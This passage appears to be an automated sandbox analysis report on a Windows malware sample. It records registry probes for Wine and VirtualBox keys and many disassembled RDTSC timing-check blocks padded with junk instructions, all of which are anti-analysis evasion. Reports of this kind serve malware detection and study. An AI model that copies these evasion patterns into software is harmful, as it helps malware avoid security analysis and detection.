                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 8EF4F2 second address: 8EF4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 8EF4F7 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD0B5348056h 0x00000009 jng 00007FD0B5348056h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 jns 00007FD0B5348064h 0x00000019 push dword ptr [ebp+122D10E1h] 0x0000001f cld 0x00000020 call dword ptr [ebp+122D1808h] 0x00000026 pushad 0x00000027 jp 00007FD0B534805Eh 0x0000002d jl 00007FD0B5348058h 0x00000033 pushad 0x00000034 popad 0x00000035 xor eax, eax 0x00000037 xor dword ptr [ebp+122D2A06h], edi 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 mov dword ptr [ebp+122D2A06h], esi 0x00000047 mov dword ptr [ebp+122D2D0Ch], eax 0x0000004d jmp 00007FD0B5348062h 0x00000052 mov esi, 0000003Ch 0x00000057 stc 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c mov dword ptr [ebp+122D1928h], ecx 0x00000062 lodsw 0x00000064 cmc 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 mov dword ptr [ebp+122D18A2h], edx 0x0000006f mov dword ptr [ebp+122D1928h], edi 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jo 00007FD0B534805Ch 0x0000007f mov dword ptr [ebp+122D1928h], edx 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a push ebx 0x0000008b pop ebx 0x0000008c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 8EEDD4 second address: 8EEDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A67D83 second address: A67D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A66E46 second address: A66E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A66FD2 second address: A66FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A676DD second address: A676E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6A875 second address: A6A889 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6A889 second address: A6A88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6A88E second address: A6A919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1965h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD0B5348058h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push A7BC0B05h 0x0000002f pushad 0x00000030 jc 00007FD0B5348058h 0x00000036 pushad 0x00000037 popad 0x00000038 jmp 00007FD0B5348063h 0x0000003d popad 0x0000003e add dword ptr [esp], 5843F57Bh 0x00000045 jns 00007FD0B5348060h 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D19A7h], edx 0x00000055 push 00000003h 0x00000057 mov edi, 168D17CEh 0x0000005c movsx edi, bx 0x0000005f push EF545AD5h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 pop esi 0x00000069 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6A9D4 second address: A6AAB5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B548336Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc cx, EFA5h 0x00000010 push 00000000h 0x00000012 or dh, 00000000h 0x00000015 call 00007FD0B5483369h 0x0000001a jnl 00007FD0B5483370h 0x00000020 push eax 0x00000021 jmp 00007FD0B5483374h 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jmp 00007FD0B548336Dh 0x0000002f mov eax, dword ptr [eax] 0x00000031 jmp 00007FD0B5483379h 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a jne 00007FD0B5483378h 0x00000040 jmp 00007FD0B5483372h 0x00000045 pop eax 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FD0B5483368h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 0000001Bh 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 clc 0x00000061 push 00000003h 0x00000063 sbb cx, 7726h 0x00000068 push 00000000h 0x0000006a mov dl, al 0x0000006c push 00000003h 0x0000006e push F09AF794h 0x00000073 pushad 0x00000074 je 00007FD0B5483374h 0x0000007a jmp 00007FD0B548336Eh 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6AAB5 second address: A6AB05 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 309AF794h 0x00000012 mov dx, di 0x00000015 lea ebx, dword ptr [ebp+1244F76Ch] 0x0000001b jmp 00007FD0B5348064h 0x00000020 mov dword ptr [ebp+122D191Eh], ebx 0x00000026 xchg eax, ebx 0x00000027 jng 00007FD0B5348060h 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 js 00007FD0B5348056h 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6AB5C second address: A6ABF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b and edi, 42685FDDh 0x00000011 mov edx, 10700C00h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FD0B5483368h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 adc esi, 13B2FA4Bh 0x00000038 call 00007FD0B5483369h 0x0000003d push edi 0x0000003e jmp 00007FD0B5483375h 0x00000043 pop edi 0x00000044 push eax 0x00000045 jnc 00007FD0B548338Bh 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f ja 00007FD0B548336Ah 0x00000055 mov eax, dword ptr [eax] 0x00000057 pushad 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6ABF9 second address: A6AC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0B5348067h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6AC20 second address: A6ACC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, dword ptr [ebp+122D2E48h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FD0B5483368h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FD0B5483368h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov ecx, dword ptr [ebp+122D2F49h] 0x0000004e mov dword ptr [ebp+122D1965h], ebx 0x00000054 push 00000003h 0x00000056 call 00007FD0B548336Ah 0x0000005b add di, 137Bh 0x00000060 pop ecx 0x00000061 mov edx, eax 0x00000063 push E4D0E2D3h 0x00000068 pushad 0x00000069 push ecx 0x0000006a push edx 0x0000006b pop edx 0x0000006c pop ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FD0B5483372h 0x00000074 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6ACC2 second address: A6AD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 24D0E2D3h 0x00000011 and edi, dword ptr [ebp+122D1A90h] 0x00000017 lea ebx, dword ptr [ebp+1244F777h] 0x0000001d push edi 0x0000001e jmp 00007FD0B5348062h 0x00000023 pop edx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FD0B534805Fh 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A54F78 second address: A54F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A54F7E second address: A54F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A54F82 second address: A54F94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD0B548336Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A89EEB second address: A89EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jng 00007FD0B5348056h 0x0000000e pop esi 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A065 second address: A8A06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A06A second address: A8A06F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A06F second address: A8A07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A54F63 second address: A54F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A54F69 second address: A54F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Bh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A35F second address: A8A395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007FD0B5348058h 0x00000011 pushad 0x00000012 jmp 00007FD0B5348066h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A546 second address: A8A54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A54C second address: A8A550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A694 second address: A8A6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD0B5483366h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A6A2 second address: A8A6C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FD0B5348056h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A946 second address: A8A958 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FD0B5483366h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8A958 second address: A8A96D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAB3 second address: A8AAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAB9 second address: A8AAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAC0 second address: A8AAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAC5 second address: A8AACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AACB second address: A8AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAD7 second address: A8AADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AADD second address: A8AAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD0B5483366h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AAFC second address: A8AB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AB00 second address: A8AB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0B5483377h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8AB1F second address: A8AB2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B4A6 second address: A8B4F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Eh 0x00000007 jnl 00007FD0B548336Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD0B5483378h 0x00000015 jmp 00007FD0B548336Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FD0B5483366h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B4F6 second address: A8B4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B4FA second address: A8B4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B617 second address: A8B61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B61D second address: A8B625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B625 second address: A8B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8B62A second address: A8B636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007FD0B5483366h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A8DABF second address: A8DAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A91D08 second address: A91D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FD0B5483375h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A92388 second address: A92392 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A92392 second address: A923CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5483370h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jno 00007FD0B5483370h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD0B548336Ah 0x00000020 push esi 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A96C0C second address: A96C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A96C1C second address: A96C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A96C20 second address: A96C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD0B5348061h 0x0000000f jbe 00007FD0B5348056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9701E second address: A97024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A97024 second address: A97028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A97028 second address: A97040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 push ebx 0x00000008 jg 00007FD0B5483366h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A972EE second address: A972F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9A231 second address: A9A237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9A237 second address: A9A285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jno 00007FD0B534805Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 ja 00007FD0B5348058h 0x00000018 jmp 00007FD0B534805Bh 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007FD0B5348060h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c jno 00007FD0B5348056h 0x00000032 pop ecx 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9A9BB second address: A9A9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9A9BF second address: A9A9C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9A9C9 second address: A9A9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD0B5483366h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B09B second address: A9B0B0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0B534805Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B17A second address: A9B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B293 second address: A9B2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B2A5 second address: A9B2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B2AB second address: A9B2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B375 second address: A9B37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9B4C1 second address: A9B4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0B5348067h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9D410 second address: A9D414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
